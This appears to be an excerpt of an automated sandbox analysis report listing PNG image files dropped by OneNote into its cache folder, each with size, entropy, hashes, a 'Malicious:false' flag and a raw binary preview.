                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000K.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5386
                                                                                                                                                                                                          Entropy (8bit):7.943706538857394
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                          MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                          SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                          SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                          SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000M.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.950380155401321
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                          MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                          SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                          SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                          SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000N.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14553
                                                                                                                                                                                                          Entropy (8bit):7.951135681293377
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                          MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                          SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                          SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                          SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000O.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8184
                                                                                                                                                                                                          Entropy (8bit):7.807848176906598
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                          MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                          SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                          SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                          SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000P.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1924
                                                                                                                                                                                                          Entropy (8bit):7.836744258175623
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                          MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                          SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                          SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                          SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000Q.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11886
                                                                                                                                                                                                          Entropy (8bit):7.946442244439929
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                          MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                          SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                          SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                          SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000R.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2270
                                                                                                                                                                                                          Entropy (8bit):7.845368393313232
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                          MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                          SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                          SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                          SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000S.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):16003
                                                                                                                                                                                                          Entropy (8bit):7.959532793770661
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                          MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                          SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                          SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                          SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000T.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13241
                                                                                                                                                                                                          Entropy (8bit):7.931391290415517
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                          MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                          SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                          SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                          SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000U.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4190
                                                                                                                                                                                                          Entropy (8bit):7.94161730428269
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                          MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                          SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                          SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                          SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000V.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4081
                                                                                                                                                                                                          Entropy (8bit):7.943373267196131
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                          MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                          SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                          SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                          SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000010.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):22634
                                                                                                                                                                                                          Entropy (8bit):7.974332204835705
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                          MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                          SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                          SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                          SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                          Malicious:false
